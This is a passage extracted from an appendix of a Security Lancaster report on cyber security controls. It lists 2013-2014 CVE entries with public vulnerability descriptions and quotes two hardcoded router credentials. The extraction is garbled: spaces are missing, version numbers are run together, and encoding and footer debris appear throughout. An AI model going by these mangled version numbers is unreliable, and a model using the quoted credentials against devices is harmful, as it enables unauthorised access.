CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
